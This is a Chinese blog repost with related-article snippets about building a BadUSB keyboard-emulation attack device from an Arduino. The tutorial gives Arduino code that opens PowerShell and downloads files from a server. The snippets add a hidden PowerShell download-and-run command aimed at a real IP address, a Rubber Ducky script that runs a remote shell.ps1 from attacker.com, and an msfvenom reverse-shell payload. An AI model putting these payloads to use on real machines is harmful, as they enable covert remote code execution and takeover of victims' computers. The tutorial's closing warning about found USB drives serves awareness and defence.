简易BadUSB,攻击效果不简单

最新推荐文章于 2022-11-14 17:10:36 发布
转载 最新推荐文章于 2022-11-14 17:10:36 发布 · 2k 阅读 · 21 ·
CC 4.0 BY-SA版权
原文链接:https://my.oschina.net/u/3612774/blog/1620625

本文介绍了一种名为BadUSB的攻击方式,通过Arduino开发板模拟键盘和鼠标操作,实现在目标计算机上执行恶意命令,如弹出警告窗口、关闭窗口及从远程服务器下载文件等操作。文章还提供了一些关键代码示例。

不久前,有小伙伴在实验室捡到一个U盘,想看看是谁的就插在了自己的电脑上,结果出现了安全软件的报毒通知……

也是因为这件事有了制作一个BadUSB的想法,可以在不被杀毒软件发现的情况下进行一些操作。

一、前期准备

Arduino:

这里使用的是BS Micro pro micro leonardo Arduino开发板。

Arduino IDE:

二、原理

BadUSB插入后会模拟键盘、鼠标对电脑进行操作,通过这些操作可以打开CMD或者Powershell并输入命令,通过这些命令可以进行简单操作或者更深一步从服务器下载文件执行。通过下载的.exe及.ps1等文件可以实现信息窃取、发送邮件等,从而达到控制目标机或者窃取信息等目的。

 

三、过程

(1)实现弹窗

关键代码:

Keyboard.press(KEY_LEFT_GUI);

Keyboard.press('r');

Keyboard.print("mshta vbscript:msgbox(\"lalala\",64,\"lalalatitle\")(window.close)");

Keyboard.press(KEY_RETURN);

(2)关闭所有窗口

关键代码:

Keyboard.press(KEY_LEFT_ALT);

Keyboard.press(KEY_F4);

Keyboard.press(KEY_RETURN);

正常情况下是Alt+F4循环使用的效果是关闭所有窗口,但很大概率会出现自动关机的状况……

(3)从服务器端下载文件

关键代码:

Keyboard.press(KEY_LEFT_CTRL);

Keyboard.press(KEY_ESC);

Keyboard.releaseAll();

Keyboard.print("powershell");

Keyboard.press(KEY_RETURN);

Keyboard.print("(new-object System.Net.WebClient).DownloadFile('http://www.example.com/example.html','d:lalala.html')");

这里只是下载了一个命名为lalala.html的文件,如果下载一个可执行文件或者Powershell脚本可以做到更多的事!

因为BadUSB模仿的是键盘、鼠标操作,所以常规的安全软件、杀毒软件不能起作用,当然防范起来也很简单:只要不让不受你信任的USB插入你心爱的电脑就不存在安全问题。但是好奇心驱使下还是有很多人会将“捡到”的U盘插入自己的电脑看看是谁的U盘、里面有什么文件。看到这篇文章之后要对来路不明的USB设备多一点防备了。

如果想要了解更多网络空间安全知识,请访问 http://www.sectown.cn/?from=oschina,或者搜索 Sectown 。

转载于:https://my.oschina.net/u/3612774/blog/1620625

chidao8420
关注
疯狂的极客--初识BadUSB
Peter_FHC的博客
05-27 3196
BadUSB是一种使用带有恶意软件编程的USB设备的计算机安全攻击,主流有四种工具,本文便对其做简单介绍。
自制BadUSB!!(电脑强制关机)
Pleasure1234的博客
01-22 1660
在美剧《黑客军团》中有过这样一个画面,组织成员在警局停车场随机的撒下大量用于钓鱼的 U 盘,然后就发生了下面的画面,然而此时警局的电脑已经被黑,即使断网也已经无济于事了。这就是一种黑客常用的手段 —— 利用 BadUSB 攻击而我今天想要介绍的只是该手段中的其中一种变体,利用了 USB 设备模拟成 HID 设备(Human Interface Device,人机交互设备,比如键盘或鼠标),从而执行代码,进行攻击和数据篡改等操作。下面的图片可以看出它伪装成了人体学输入设备。
Badusb原理及制作并简单免杀实现远控教程
热门推荐
天乐的博客
10-23 1万+
2014年美国黑帽大会上研究人员JakobLell和Karsten Nohl展示了badusb攻击方法后,国内与badusb相关的文章虽然有了一些,但是大部分人把相关文章都阅读后还是会有种“不明觉厉”的感觉,badusb仍有一层朦胧的面纱。本文将带你揭开这层神秘的面纱。 Badusb原理:利用HID(Human InterfaceDevice,是计算机直接与人交互的设备,例如键盘、鼠标等)进行攻击,将USB设备伪装使电脑识别为键盘,再利用USB设备中的微控制芯片,向主机发送命令,从而实现完全控制主机。 漏
基于Arduino Leonardo的进阶Badusb(Python+SMTP)
zbp_12138的博客
12-24 2153
今天要做的badusb跟上一期比,不太一样的地方是,我加了一个发送邮件的功能,具体来说,就是插入开发板以后,程序自动把该机器的ip地址获取下来,并以邮件的形式发送给指定的收件人.先来看看效果吧: 进阶版BADUSB操作演示 为了让大家看的比较清楚,我没有加入隐藏的功能,这个功能...
从零开始学badusb(2)--badusb调用命令行
azraelxuemo的博客
05-28 2216
上一节初步接触了badusb,这节我们学习一下怎么调用cmd 首先是简易版的 #include <Keyboard.h> void setup() { Keyboard.begin(); delay(1000); Keyboard.press(KEY_LEFT_GUI); delay(500); Keyboard.print("r"); delay(500); Keyboard.release(KEY_LEFT_GUI); delay(500); Keyboard.pr
BadUSB利用以及免杀(测试bypass某数字卫士)
r250414958的博客
03-03 1356
文章写了有一段时间了,本来打算投稿某网站的,但发现太菜了,索性算了 系统:windows_7_64_专业版 工具:cobalt strike3.14、Teensy++2.0 关于利用方面 我首先就想到了powershell,但是网上的免杀方法已经被杀得七七八八了 但是天无绝人之路,再继续搜索下看到了白色键盘师傅的文章,经过测试可绕过文章发布最新的某数字卫士上线 https://www.temp33.com/bypass%E7%B3%BB%E5%88%97-%E7%BB%95%E8%BF%87360%E6%
u盘插在电脑上没有反应_插一个U盘黑一台电脑Badusb最详细制作教程
weixin_39999536的博客
11-06 1215
文章来源:重生信息安全文章作者:J0o1ey0x001-简介概述在2014年美国黑帽大会上,安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”的攻击方法,这种攻击方法让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当危险的状态2.Badusb内部结构从这张图便可以了解到--Badusb和普通的U盘并没有什么两...
CobaltStrike BadUSB简易免杀制作教程
- 实施BadUSB攻击,即使用物理设备(如Arduino Leonardo)作为媒介,将恶意代码注入到受害者的计算机。具体步骤包括: - 将硬件插入目标电脑,连接到适当的串口。 - 在Arduino IDE中选择硬件配置,并设置键盘通讯...
外设热插拔风险全揭示:软硬件联合防护的4层防御体系构建指南
!...# 1. 外设热插拔的潜在风险...系统层面,恶意设备可利用热插拔绕过安全检测,伪装成标准输入设备实施“BadUSB攻击,窃取敏感信息。此外,驱动加载过程中的内存泄漏、权限越界等问题,也为攻击者提供了持久化驻留的入
Ubuntu系统下数字媒体设备与音视频使用指南
# Ubuntu系统下数字媒体设备与音视频使用指南 ## 1. 安卓设备弹出操作 ...安卓手机也很流行,此外还有价格仅15美元的简易USB MP3播放器,以及基于Linux系统的Palm Pre手机等其他设备。 在Ubuntu系统中使
Python资源大全
zheng_ruiguo的专栏
03-01 8159
Python资源 Python 3.7.4 文档:https://docs.python.org/zh-cn/3.7/ 快速安装模块:pip3 install PyQt5 -i https://pypi.tuna.tsinghua.edu.cn/simple python开源项目及示例代码:https://www.cnblogs.com/dpf-learn/p/8053043....
Badusb下载源码
09-24
Badusb下载源码void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("POWERSHELL -NOP -W HIDDEN -C sET-eXECUTIONpOLICY UNRESTRICTED -FORCE;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE('HTTP://182.16.98.84/1.TXT', 'D:1.TXT');START D:1.TXT;EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { }
基于树莓派的多功能USB实现--BadUSB模式
qinguo123的博客
02-06 5093
此文首先发表于微信公众号。具体详情请移步公众号查看:WriteSimpleDemo Github https://github.com/pedroqin/RaspberryPi-based-multi-functional-USB-Device Badusb介绍 BadUSB is a dangerous USB security flaw that allows attackers to ...
BadUsb制作
qq_34341458的博客
03-09 8744
型号: Digispark kickstarter 微型USB开发板 ATTINY58 就是下面这种 x宝有卖9元左右。 一. 准备: attiny驱动下载:https://www.arduino.cc/en/Main/Software?setlang=cn Arduino IDE:https://www.arduino.cc/en/software 免杀工具(自选):https://github.com/danielbohannon/Invoke-Obfuscation CobaltStrike且有
Bad usb实现U盘攻击
qq_40624810的博客
09-18 7802
1、Bad usb介绍及原理 介绍 BadUSB是利用伪造HID设备执行攻击载荷的一种攻击方式。用户插入BadUSB,就会自动执行预置在固件中的恶意代码,如下载服务器上的恶意文件,执行恶意操作等。由于恶意代码内置于设备初始化固件中,而不是通过autorun.inf等媒体自动播放文件进行控制,因此无法通过禁用媒体自动播放进行防御,杀毒软件更是无法检测设备固件中的恶意代码。这种攻击方式可以在不经意...
IOT黑客入门篇之初探Badusb
网安君的博客
11-14 3791
BadUSB是一种使用带有恶意软件编程的USB设备的计算机安全攻击。例如,USB 闪存驱动器可以包含可编程的Intel 8051微控制器,该微控制器可以重新编程,将USB闪存驱动器变成恶意设备。BadUSB 攻击是在 2014 年由Karsten Nohl、Sascha Krißler和Jakob Lell在一次Black Hat演讲中首次披露的。演讲两个月后,其他研究人员发布了可用于利用该漏洞的代码。2017年,USG加密狗1.0版本发布,其作用类似于硬件防火墙,旨在防止BadUSB风格的攻击
Badusb制作及使用(渗透windows)
QQ670663的博客
06-19 1万+
目录一、安装Dpinst驱动二、配置Automator三、实现插入Babusb远程渗透win10系统“BadUSB”是计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在BlackHat安全大会上公布。BadUSB最可怕的一点是恶意代码存在于U盘的固件中,由于PC上的杀毒软件无法访问到U盘存放固件的区域,因此也就意味着杀毒软件和U盘格式化都无法应对BadUSB进行攻击。........................
badusb攻击代码
最新发布
07-14
BadUSB攻击通常涉及硬件设备的编程,使其在插入目标主机时模拟成其他类型的设备(如键盘、网络适配器等),从而执行恶意操作。这种攻击方式常用于渗透测试中的社会工程场景,利用人们对未知USB设备的好奇心进行入侵[^1]。以下是一些常见的BadUSB攻击代码实现示例及常用渗透测试工具。 ### 3.1 使用 Arduino Leonardo 实现 HID 攻击 Arduino Leonardo 是一种常用的微控制器,可以模拟成键盘设备,执行预定义的按键指令,实现自动化攻击。 ```cpp #include <Keyboard.h> void setup() { // 启动键盘 Keyboard.begin(); delay(1000); // 等待设备初始化 // 模拟按下 Win + R 打开运行窗口 Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r'); delay(100); Keyboard.releaseAll(); delay(500); // 输入命令并执行 Keyboard.print("notepad.exe"); Keyboard.press(KEY_ENTER); Keyboard.release(KEY_ENTER); delay(1000); // 输入文本 Keyboard.print("You have been hacked by BadUSB!"); delay(1000); // 结束 Keyboard.end(); } ``` 该代码会在插入设备后打开记事本并输入提示信息,适用于演示或基础攻击场景。 ### 3.2 使用 Hak5 USB Rubber Ducky 实现命令注入 Rubber Ducky 是一种专为BadUSB攻击设计的设备,使用Ducky Script语言编写攻击脚本,支持快速执行PowerShell、CMD等命令。 ```ducky DELAY 1000 GUI r DELAY 500 STRING powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')" ENTER ``` 该脚本会在插入设备后打开“运行”窗口,执行一段隐藏的PowerShell命令,从远程服务器下载并执行恶意脚本[^1]。 ### 3.3 使用 Teensy 微控制器模拟键盘行为 Teensy 是另一种常用于BadUSB攻击的微控制器,具备更高的灵活性和可编程性,适合定制化攻击载荷。 ```cpp #include <Keyboard.h> void setup() { Keyboard.begin(); delay(1000); // Win + R Keyboard.set_modifier(MODIFIERKEY_GUI); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); delay(500); // 输入命令 Keyboard.print("cmd /c calc.exe"); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); delay(1000); Keyboard.end(); } ``` 该代码会模拟按下 Win+R 并运行 `calc.exe`,适用于演示或更复杂的攻击流程。 --- ### 3.4 常用渗透测试工具与资源 以下是一些常见的BadUSB渗透测试工具和GitHub资源: - **USB Rubber Ducky Toolkit** [GitHub 项目](https://github.com/hak5darren/USB-Rubber-Ducky) 提供完整的Ducky Script编写与编译工具链,适用于快速部署攻击载荷。 - **Teensy Loader** [PJRC 官网](https://www.pjrc.com/teensy/loader.html) 提供Teensy系列微控制器的固件烧录工具,支持C/C++编写自定义攻击逻辑。 - **BadUSB Framework** [GitHub 上的 BadUSB 框架](https://github.com/ernw/badusb) 提供多种攻击场景的示例代码,涵盖HID攻击、网络欺骗等。 - **Arduino IDE** [Arduino 官方网站](https://www.arduino.cc/) 提供开发环境支持,适用于快速部署基于Arduino Leonardo的BadUSB攻击。 - **Metasploit Framework** 在成功执行初始载荷后,可使用 Metasploit 生成反向 Shell 或 Meterpreter 会话: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe > shell.exe ``` --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值